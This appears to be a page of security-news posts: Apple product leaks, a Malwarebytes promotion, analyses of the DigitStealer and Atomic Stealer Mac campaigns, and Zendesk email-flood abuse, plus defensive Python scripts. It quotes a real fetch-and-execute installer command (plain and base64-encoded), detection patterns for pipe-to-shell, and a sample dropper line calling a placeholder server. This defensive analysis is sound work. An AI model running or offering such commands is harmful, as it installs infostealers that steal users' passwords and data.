Apple doesn’t like to talk about its upcoming products before it’s ready, but sometimes the company’s software does the talking for it. So far this week we’ve had a couple of software-related leaks that have outed products Apple is currently testing—one a pre-release build of iOS 26, and the other some leaked files from a kernel debug kit (both via MacRumors).
Most of the new devices referenced in these leaks are straightforward updates to products that already exist: a new Apple TV, a HomePod mini 2, new AirTags and AirPods, an M4 iPad Air, a 12th-generation iPad to replace the current A16 version, next-generation iPhones (including the 17e, 18, and the rumored foldable model), a new Studio Display model, some new smart home products we’ve already heard about elsewhere, and M5 updates for the MacBook Air, Mac mini, Mac Studio, and the other MacBook Pros. There’s also yet another reference to the lower-cost MacBook that Apple is apparently planning to replace the M1 MacBook Air it still sells via Walmart for $599.
For power users, though, the most interesting revelation might be that Apple is working on a higher-end Apple Silicon iMac powered by an M5 Max chip. The kernel debug kit references an iMac with the internal identifier J833c, based on a platform identified as H17C—and H17C is apparently based on the M5 Max, rather than a lower-end M5 chip. (For those who don’t have Apple’s branding memorized, “Max” is associated with Apple’s second-fastest chips; the M5 Max would be faster than the M5 or M5 Pro, but slower than the rumored M5 Ultra.)
Say hello to the upgraded Malwarebytes for Mac—now with more robust protection, more control, and the same trusted defense you count on every day.
We’ve given our Mac scan engine a serious intelligence boost, so it thinks faster and digs deeper. The new enhanced scan searches across more of your system to hunt down even the most advanced threats, from stealthy infostealers to zero-hour malware, all while keeping the straightforward experience you love.
But that’s not all. We’ve also achieved a major performance boost, with up to 90% lower CPU usage for Malwarebytes for Mac.
What’s new
The upgrade comes with three new scan options designed to fit the way you work:
Quick scan: A speedy sweep of the usual suspects.
Threat scan: A full system check that is now your default.
Custom scan: Total control, letting you choose exactly what to scan, including folders and external drives.
It’s smarter protection that adapts to your needs.
What to expect
Your first enhanced scan may take a little longer. That’s because it’s covering more of your system than ever before to make sure nothing slips through the cracks. And with external drive scanning and WiFi security alerts, there is nowhere for viruses, infostealers, or spyware to linger.
After that, you’ll notice the difference. Scans will feel faster, lighter, and more intuitive.
The always-on, automated protection in Malwarebytes for Mac monitors every file you open, download, or save. We have now made it significantly more efficient: our latest enhancements reduce CPU usage by up to 90%, which means a faster, snappier, and more responsive experience.
No action needed. Your protection just got better.
You don’t have to lift a finger; your protection simply levels up. Open Malwarebytes and explore the new scan options when you’re ready. Don’t see them yet? Make sure you’re on the latest version (5.19) under Profile → About Malwarebytes. If you aren’t, go to the Malwarebytes menu and select Check for updates.
Welcome to the next era of Mac security from Malwarebytes. More robust coverage, harnessing the same trusted protection you know, directly in your control.
A new infostealer called DigitStealer is going after Mac users. It avoids detection, skips older devices, and steals files, passwords, and browser data. We break down what it does and how to protect your Mac.
Researchers have described a new malware called DigitStealer that steals sensitive information from macOS users.
This variant comes with advanced detection-evasion techniques and a multi-stage attack chain. Most infostealers go after the same types of data and use similar methods to get it, but DigitStealer is different enough to warrant attention.
A few things make it stand out: platform-specific targeting, fileless operation, and anti-analysis techniques. Together, they pose relatively new challenges for Mac users.
The attack starts with a fake installer for a utility app called “DynamicLake,” hosted on a look-alike website rather than the developer’s own site. The page instructs the user to drag a file into Terminal. Dropping a file onto a Terminal window pastes its path as a command, and once the user presses Return the script runs and initiates the download and installation of DigitStealer.
If your system matches certain regions, or is a virtual machine, the malware won’t run. That likely serves two purposes: hindering analysis by researchers, and avoiding infections in the operators’ home country, which in some jurisdictions is what keeps them out of prison. It also limits itself to Macs with ARM features introduced with the M2 chip or later, skipping older Apple Silicon Macs, Intel-based Macs, and most virtual machines.
The attack chain is largely fileless, so it leaves few traces on an affected machine. Instead of writing the payload to disk and executing it from there, a fileless attack runs the payload directly in memory (RAM). Keeping malicious code in memory rather than on disk has several advantages for attackers:
Evasion of file-based security measures: file-signature scanning and other controls that examine what lands on disk have little to inspect, so conventional security tools find fileless payloads harder to identify.
Harder to remediate and investigate: with few or no files written, there are fewer artifacts to remove once the attack is detected, and less for forensic analysts to work with when tracing the attack back to its source and restoring the system to a known-good state.
DigitStealer’s initial payload asks for your password and tries to steal documents, notes, and files. If successful, it uploads them to the attackers’ servers.
The second stage of the attack goes after browser information from Chrome, Brave, Edge, Firefox and others, as well as keychain passwords, crypto wallets, VPN configurations (specifically OpenVPN and Tunnelblick), and Telegram sessions.
How to protect your Mac
DigitStealer shows how Mac malware keeps evolving. It differs from other infostealers by splitting its attack into stages, targeting only newer Mac hardware, and leaving barely any trace.
But you can still protect yourself:
Use an up-to-date real-time anti-malware solution. DigitStealer highlights the need for advanced behavioral protection, not just signature scans. Malwarebytes for Mac detects DigitStealer as MacOA.Stealer.DigitSteal.
Be careful what you run in Terminal. Never paste or drag in commands from a web page, email, or message you did not ask for.
Be careful where you download apps from.
Keep your software, especially your operating system and your security defenses, up to date.
Cybercriminals are abusing a widespread lack of authentication in the customer service platform Zendesk to flood targeted email inboxes with menacing messages that come from hundreds of Zendesk corporate customers simultaneously.
Zendesk is an automated help desk service designed to make it simple for people to contact companies for customer support issues. Earlier this week, KrebsOnSecurity started receiving thousands of ticket creation notification messages through Zendesk in rapid succession, each bearing the name of different Zendesk customers, such as CapCom, CompTIA, Discord, GMAC, NordVPN, The Washington Post, and Tinder.
The abusive missives sent via Zendesk’s platform can include any subject line chosen by the abusers. In my case, the messages variously warned about a supposed law enforcement investigation involving KrebsOnSecurity.com, or else contained personal insults.
Moreover, the automated messages that are sent out from this type of abuse all come from customer domain names — not from Zendesk. In the example below, replying to any of the junk customer support responses from The Washington Post’s Zendesk installation shows the reply-to address is help@washpost.com.
One of dozens of messages sent to me this week by The Washington Post.
Notified about the mass abuse of their platform, Zendesk said the emails were ticket creation notifications from customer accounts that configured their Zendesk instance to allow anyone to submit support requests — including anonymous users.
“These types of support tickets can be part of a customer’s workflow, where a prior verification is not required to allow them to engage and make use of the Support capabilities,” said Carolyn Camoens, communications director at Zendesk. “Although we recommend our customers to permit only verified users to submit tickets, some Zendesk customers prefer to use an anonymous environment to allow for tickets to be created due to various business reasons.”
Camoens said requests that can be submitted in an anonymous manner can also make use of an email address of the submitter’s choice.
“However, this method can also be used for spam requests to be created on behalf of third party email addresses,” Camoens said. “If an account has enabled the auto-responder trigger based on ticket creation, then this allows for the ticket notification email to be sent from our customer’s accounts to these third parties. The notification will also include the Subject added by the creator of these tickets.”
Zendesk claims it uses rate limits to prevent a high volume of requests from being created at once, but those limits did not stop Zendesk customers from flooding my inbox with thousands of messages in just a few hours.
“We recognize that our systems were leveraged against you in a distributed, many-against-one manner,” Camoens said. “We are actively investigating additional preventive measures. We are also advising customers experiencing this type of activity to follow our general security best practices and configure an authenticated ticket creation workflow.”
In all of the cases above, the messaging abuse would not have been possible if Zendesk customers validated support request email addresses prior to sending responses. Failing to do so may make it easier for Zendesk clients to handle customer support requests, but it also allows ne’er-do-wells to sully the sender’s brand in service of disruptive and malicious email floods.
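The configuration mistake described above is easy to model. The following added example is my own code; it is not Zendesk’s code or API and does not reproduce their settings. It simulates three help-desk tenants: with anonymous tickets and an auto-responder that echoes the submitter’s subject to the submitter-supplied address, an attacker’s loop turns every tenant into a relay against one victim; with verification required first, the victim receives at most one fixed-text confirmation per tenant and never sees the attacker’s subject line. The tenant domains and the victim address are constructed.

```python
"""Model of anonymous-ticket auto-responder abuse and its fix.

Added example, not Zendesk's code or API. HelpDesk stands in for one
tenant's intake configuration; flood() is the attacker's loop.
"""
import secrets
from dataclasses import dataclass, field


@dataclass
class Message:
    sender: str
    to: str
    subject: str


@dataclass
class HelpDesk:
    domain: str
    allow_anonymous: bool = True        # the weak setting at the heart of the story
    require_verification: bool = False  # hardened: confirm the address first
    outbox: list = field(default_factory=list)
    verified: set = field(default_factory=set)
    pending: dict = field(default_factory=dict)  # token -> (email, subject)
    awaiting: set = field(default_factory=set)   # addresses with a live confirmation

    def _send(self, to: str, subject: str) -> None:
        # Notifications leave from the tenant's own domain, not the platform's.
        self.outbox.append(Message(f"help@{self.domain}", to, subject))

    def create_ticket(self, requester: str, subject: str, authenticated: bool = False) -> str:
        if not (authenticated or self.allow_anonymous):
            return "rejected"
        if authenticated or requester in self.verified or not self.require_verification:
            # Weak path: the auto-responder echoes the caller-chosen subject
            # to the caller-chosen address, once per ticket.
            self._send(requester, f"[{self.domain}] Ticket received: {subject}")
            return "notified"
        if requester in self.awaiting:
            return "held"  # one outstanding confirmation per address, so repeats cost nothing
        token = secrets.token_urlsafe(16)
        self.pending[token] = (requester, subject)
        self.awaiting.add(requester)
        # Fixed wording, no attacker-chosen content, sent once per address.
        self._send(requester, f"[{self.domain}] Confirm your support request")
        return "confirmation-sent"

    def confirm(self, token: str) -> str:
        """Called when the recipient follows the link in the confirmation mail."""
        if token not in self.pending:
            return "invalid-token"
        requester, subject = self.pending.pop(token)
        self.awaiting.discard(requester)
        self.verified.add(requester)
        self._send(requester, f"[{self.domain}] Ticket received: {subject}")
        return "notified"


def flood(desks: list, target: str, attempts: int) -> list:
    """Attacker: the same forged-requester ticket against every tenant.

    Returns the messages that land in the target's inbox across all tenants."""
    for desk in desks:
        for i in range(attempts):
            desk.create_ticket(target, f"URGENT: law enforcement inquiry #{i}")
    return [m for desk in desks for m in desk.outbox if m.to == target]


if __name__ == "__main__":
    tenants = ("tenant-a.example", "tenant-b.example", "tenant-c.example")  # constructed
    victim = "victim@example.test"                                          # constructed
    weak = flood([HelpDesk(d) for d in tenants], victim, 50)
    hardened = flood([HelpDesk(d, require_verification=True) for d in tenants], victim, 50)
    print(f"weak config: {len(weak)} messages, e.g. {weak[0].subject!r}")
    print(f"hardened:    {len(hardened)} messages, e.g. {hardened[0].subject!r}")
```

The hardened path still sends one message per tenant to an address the attacker chose, which is why the confirmation text is fixed and sent once per address; real deployments should also rate-limit ticket creation per source and reject submissions for domains that have opted out.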
Fake versions of legitimate software are currently circulating on GitHub pages, in a large-scale campaign targeting Mac users.
Unfortunately, Malwarebytes for Mac is one of them.
Impersonating brands is sadly commonplace, as scammers take advantage of established brand names to target their victims. So this is nothing new, but we always want to warn you about it when we see it happening.
In this case, the cybercriminals’ goal is to distribute information stealers. They figured out a while ago that the easiest way to infect Macs is to get users to install the malware themselves, and the Atomic Stealer (aka AMOS) is the go-to information stealer for Macs.
The LastPass Threat Intelligence team has posted information about the campaign, which follows a similar pattern for all the impersonated software. Sometimes, the starting point is a sponsored Google ad (did we mention we don’t like them? Oh yes, we did!) that points to GitHub instead of the official page of the developer.
But in other, less obvious cases, you may see search results like these:
These only came up at the top of the search results when I explicitly searched for “Malwarebytes Github MacOS”, but the cybercriminals are known to have used Search Engine Optimization (SEO) techniques to get their listings higher in the search results.
The idea is to get the aspiring user to click on the “GET MALWAREBYTES” button on the dedicated GitHub page.
If someone does click that button, they will end up on a download page with instructions on how to install the fake product, which is actually an information stealer.
The Terminal installation instructions for the fake Malwarebytes for Mac pointed to a recently registered domain, but thankfully our Browser Guard blocked it anyway.
Here’s a technical breakdown of the instructions provided to the visitor:
/bin/bash -c "<something>" runs a command using the Bash shell on macOS or Linux. Bash is the interpreter for shell commands.
The part in quotes uses $( ... ). Everything inside this gets executed first; its output becomes part of the outer command.
$(echo aHR0cHM6Ly9nb3NyZWVzdHIuY29tL2h1bi9pbnN0YWxsLnNo | base64 -d): echo prints the long string and base64 -d decodes it. The encoding hides the download URL from anyone glancing at the command; decoding the string yourself (without running anything else) reveals the address the script is fetched from.
curl -fsSL is a command to download data from the web. The options mean:
-f: Fail with no output on HTTP errors, rather than passing the server’s error page on as if it were the script.
-s: Silent mode (no progress bar).
-S: Show errors even though -s is used.
-L: Follow redirects, so the script can ultimately come from a different server than the one named in the URL.
The outer command becomes: /bin/bash -c "$(curl -fsSL https://gosreestr[.]com/hun/install.sh)"
So, the complete command tells the system to download a script directly from an external server and immediately execute it using Bash.
This is dangerous for the user on many levels. There is no prompt or review step, so the user never gets to see or assess what the downloaded script will do before it runs. Because the script is fetched and executed from the command line rather than downloaded and opened as an app, it sidesteps the protections that apply to downloaded files: a file fetched with curl carries no quarantine attribute, so Gatekeeper never evaluates it. And since the server decides what curl receives, the attacker can change the payload at any time without touching the page the victim saw.
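To see what such a one-liner would do without running it, here is an added example (my own code, not Malwarebytes’ or LastPass’s) that takes a pasted command, decodes the $(echo … | base64 -d) substitution, reconstructs the command the shell would actually execute, extracts and defangs the URLs, and flags the fetch-and-execute patterns discussed above. The same check applies to the drag-a-file-into-Terminal lure used by DigitStealer earlier on this page, since that too is a script handed to the shell. The sample command is the one quoted above; it is decoded only, never fetched.

```python
"""Triage a pasted "installer" one-liner without running it.

Added example, not code from the original post or from Malwarebytes or
LastPass. It peels base64 command substitutions, reconstructs the command
the shell would run, extracts and defangs URLs, and flags fetch-and-execute
patterns. Nothing is fetched or executed.
"""
import base64
import binascii
import re
from dataclasses import dataclass
from urllib.parse import urlsplit

# Constructed sample: the one-liner quoted in the post above.
SAMPLE = ('/bin/bash -c "$(curl -fsSL $(echo '
          'aHR0cHM6Ly9nb3NyZWVzdHIuY29tL2h1bi9pbnN0YWxsLnNo | base64 -d))"')

# $(echo <base64> | base64 -d), also accepting -D / --decode and a quoted blob
B64_SUBST = re.compile(
    r"\$\(\s*echo\s+(?:-n\s+)?['\"]?([A-Za-z0-9+/=]+)['\"]?\s*\|\s*base64\s+"
    r"(?:-d|-D|--decode)\s*\)")
URL_RE = re.compile(r"https?://[^\s\"'()<>]+")

# Heuristics, each with a short finding tag.
PATTERNS = [
    # curl/wget output piped straight into a shell
    (re.compile(r"\b(?:curl|wget)\b[^|;&\n]*\|\s*(?:sudo\s+)?(?:/bin/)?(?:ba|z)?sh\b"),
     "fetch-exec:pipe-to-shell"),
    # sh -c "$(curl ...)": the downloaded body becomes the command string
    (re.compile(r"(?:ba|z)?sh\s+-c\s+[\"']?\$\(\s*(?:curl|wget)\b"),
     "fetch-exec:command-substitution"),
    # stripping the quarantine attribute so Gatekeeper never sees the file
    (re.compile(r"\bxattr\b[^;&|\n]*(?:-c\b|com\.apple\.quarantine)"),
     "gatekeeper-bypass:xattr"),
]


@dataclass
class Verdict:
    resolved: str   # command after decoding substitutions
    urls: list      # defanged URLs found in the resolved command
    findings: list  # tags from PATTERNS plus obfuscation notes


def defang(url: str) -> str:
    """hxxps://host[.]tld/path so the URL is not clickable in a report."""
    p = urlsplit(url)
    scheme = p.scheme.replace("http", "hxxp", 1)
    out = f"{scheme}://{p.netloc.replace('.', '[.]')}{p.path}"
    return out + (f"?{p.query}" if p.query else "")


def decode_base64_substitutions(cmd: str, max_layers: int = 5) -> str:
    """Replace each $(echo <b64> | base64 -d) with its decoded text.

    Repeats so nested or chained encodings are peeled one layer at a time;
    stops at the first blob that is not valid base64.
    """
    for _ in range(max_layers):
        m = B64_SUBST.search(cmd)
        if not m:
            break
        try:
            decoded = base64.b64decode(m.group(1), validate=True)
        except (binascii.Error, ValueError):
            break
        cmd = cmd[:m.start()] + decoded.decode("utf-8", "replace") + cmd[m.end():]
    return cmd


def triage(cmd: str) -> Verdict:
    """Static analysis only: no network, no subprocess."""
    findings = []
    if B64_SUBST.search(cmd):
        findings.append("obfuscation:base64-substitution")
    resolved = decode_base64_substitutions(cmd)
    for pattern, tag in PATTERNS:
        if pattern.search(resolved):
            findings.append(tag)
    urls = [defang(u) for u in URL_RE.findall(resolved)]
    return Verdict(resolved, urls, findings)


if __name__ == "__main__":
    v = triage(SAMPLE)
    print("resolved:", v.resolved)
    print("urls:    ", v.urls)
    print("findings:", v.findings)
```

Paste any suspicious install command into triage() before deciding whether to run it; an empty findings list is not a clean bill of health, only the absence of these particular patterns.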
The download locations have already been taken down, but anyone who recognizes this infection chain from something they ran should thoroughly check their machine for an infection.
Impersonated software besides Malwarebytes and LastPass included:
1Password
ActiveCampaign
After Effects
Audacity
Auphonic
Basecamp
BetterSnapTool
Biteable
Bitpanda
Bitsgap
Blog2Social
Blue Wallet
Bonkbot
Carbon Copy Cloner
Charles Schwab
Citibank
CMC Markets
Confluence
Coolors
DaVinci Resolve
DefiLlama
Desktop Clockology
Desygner
Docker
Dropbox
E-TRADE
EigenLayer
Fidelity
Fliki
Freqtrade Bot
Freshworks
Gemini
GMGN AI
Gunbot
Hemingway Editor
HeyGen
Hootsuite
HTX
Hypertracker
IRS
KeyBank
Lightstream
Loopback
Maestro Bot
Melon
Metatrader 5
Metricool
Mixpanel
Mp3tag
Mural
NFT Creator
NotchNook
Notion
Obsidian
Onlypult
Pendle Finance
Pepperstone
Pipedrive
Plus500
Privnote
ProWritingAid
Publer
Raycast
Reaper
RecurPost
Renderforest
Rippling
Riverside.fm
Robinhood
Rug AI
Sage Intacct
Salesloft
SentinelOne
Shippo
Shopify
SocialPilot
Soundtrap
StreamYard
SurferSEO
Thunderbird
TweetDeck
Uphold
Veeva CRM
Viraltag
VSCO
Vyond
Webull
Xai Games
XSplit
Zealy
Zencastr
Zenefits
Zotero
But it’s highly likely that there will be more, so don’t see this as an exhaustive list.
How to stay safe
Both ThreatDown and Malwarebytes for Mac detect and block this Atomic Stealer variant and many others, but it’s better to not download it at all. There are a few golden guidelines on how to stay safe:
Never run copy-pasted commands from random pages or forums even if they are on seemingly legitimate GitHub pages, and especially don’t use any that involve curl … | bash or similar combos.
Always download software from the official developer pages. If they do not host it themselves, verify the download links with them.
Avoid sponsored search results. At best they cost the company you looked for money and at worst you fall prey to imposters.
If you have scanned your Mac and found the information stealer:
Remove any suspicious login items, LaunchAgents, or LaunchDaemons from the Library folders to ensure the malware does not persist after reboot.
If any signs of persistent backdoor or unusual activity remain, strongly consider a full clean reinstall of macOS to ensure all malware components are eradicated. Only restore files from known clean backups. Do not reuse backups or Time Machine images that may be tainted by the infostealer.
After reinstalling, check for additional rogue extensions, crypto wallet apps, and system modifications.
Change all the passwords that were stored on the affected system and enable multi-factor authentication for your important accounts.
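For the persistence check in the steps above, here is an added example (my own code, not Malwarebytes’) that parses the launchd plists in the LaunchAgents and LaunchDaemons folders, shows what each one runs and when, and marks indicators that commonly go with droppers like this one: a shell started with -c and an inline script, curl/base64/pipe-to-shell tokens in the arguments, programs in temporary locations, labels that are not reverse-DNS names, and KeepAlive set. It only reads; it removes nothing. The indicator thresholds and the constructed sample plists are this example’s own, not artifacts from the campaign.

```python
"""Triage launchd persistence entries (LaunchAgents / LaunchDaemons).

Added example, not Malwarebytes' code. Read-only: it reports, you decide.
"""
import os
import plistlib
import re
import tempfile
from dataclasses import dataclass, field

LAUNCHD_DIRS = [
    "/Library/LaunchAgents",
    "/Library/LaunchDaemons",
    os.path.expanduser("~/Library/LaunchAgents"),
]
VOLATILE = ("/tmp/", "/private/tmp/", "/private/var/tmp/", "/var/folders/", "/Users/Shared/")
SHELLS = ("/bin/sh", "/bin/bash", "/bin/zsh", "/usr/bin/env")
SUSPICIOUS = re.compile(r"\b(curl|wget|base64|osascript|nohup|eval)\b|\|\s*(?:ba|z)?sh\b", re.I)
LABEL_OK = re.compile(r"^[A-Za-z0-9-]+(\.[A-Za-z0-9_-]+)+$")  # com.vendor.product


@dataclass
class Entry:
    path: str
    label: str
    argv: list
    run_at_load: bool
    keep_alive: bool
    reasons: list = field(default_factory=list)

    @property
    def score(self) -> int:
        return len(self.reasons)


def load_entry(path: str) -> Entry:
    """Parse one launchd plist; a file that will not parse is itself notable."""
    try:
        with open(path, "rb") as f:
            data = plistlib.load(f)
    except Exception as exc:  # any parse failure: report it rather than skip it
        return Entry(path, "<unreadable>", [], False, False, [f"could not parse plist: {exc}"])
    argv = data.get("ProgramArguments") or ([data["Program"]] if "Program" in data else [])
    return Entry(path, str(data.get("Label", "<no label>")), [str(a) for a in argv],
                 bool(data.get("RunAtLoad", False)), bool(data.get("KeepAlive", False)))


def assess(e: Entry) -> Entry:
    """Attach indicator strings; an empty list means nothing stood out."""
    if e.reasons:  # loading already failed; nothing further to assess
        return e
    prog = e.argv[0] if e.argv else ""
    if not e.argv:
        e.reasons.append("no Program/ProgramArguments")
    if prog.startswith(VOLATILE):
        e.reasons.append(f"runs from volatile location {prog}")
    if prog in SHELLS and "-c" in e.argv[1:]:
        e.reasons.append("shell -c with an inline script (no binary to inspect)")
    if SUSPICIOUS.search(" ".join(e.argv)):
        e.reasons.append("download/decode/pipe-to-shell tokens in arguments")
    if prog and not os.path.exists(prog):
        e.reasons.append(f"program not found on disk: {prog}")
    if not LABEL_OK.match(e.label):
        e.reasons.append(f"label is not reverse-DNS style: {e.label!r}")
    if e.keep_alive and e.reasons:
        e.reasons.append("KeepAlive set: launchd restarts it if you only kill the process")
    return e


def scan(dirs=LAUNCHD_DIRS) -> list:
    """Entries from every existing directory, most suspicious first."""
    entries = []
    for d in dirs:
        if os.path.isdir(d):
            for name in sorted(os.listdir(d)):
                if name.endswith(".plist"):
                    entries.append(assess(load_entry(os.path.join(d, name))))
    return sorted(entries, key=lambda e: e.score, reverse=True)


def make_sample_dir() -> str:
    """Constructed fixtures (not real infection artifacts) so the scanner can be
    exercised on any OS: a plausible updater, a dropper-style job, and junk."""
    d = tempfile.mkdtemp(prefix="launchd-sample-")
    samples = {
        "com.example.updater.plist": {"Label": "com.example.updater", "RunAtLoad": True,
                                      "Program": "/Applications/Example.app/Contents/MacOS/updater"},
        "helper.plist": {"Label": "helper", "RunAtLoad": True, "KeepAlive": True,
                         "ProgramArguments": ["/bin/sh", "-c", "curl -fsSL http://c2.example/s | sh"]},
    }
    for name, data in samples.items():
        with open(os.path.join(d, name), "wb") as f:
            plistlib.dump(data, f)
    with open(os.path.join(d, "junk.plist"), "wb") as f:
        f.write(b"not a plist")
    return d


if __name__ == "__main__":
    import sys
    for e in scan(sys.argv[1:] or LAUNCHD_DIRS):
        print(("!! " if e.reasons else "ok ") + f"{e.label}  {e.path}")
        print(f"   argv={e.argv} RunAtLoad={e.run_at_load} KeepAlive={e.keep_alive}")
        for r in e.reasons:
            print("   -", r)
```

Run it with no arguments on the Mac you are checking, or point it at a copy of the folders taken from a machine you are investigating; anything marked with a reason deserves a look at the referenced program before you delete the plist.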
If all this sounds too difficult for you to do yourself, ask someone or a company you trust to help you—our support team are happy to assist you if you have any concerns.
We don’t just report on threats – we help safeguard your entire digital identity
Cybersecurity risks should never spread beyond a headline. Protect your—and your family’s—personal information by using identity protection.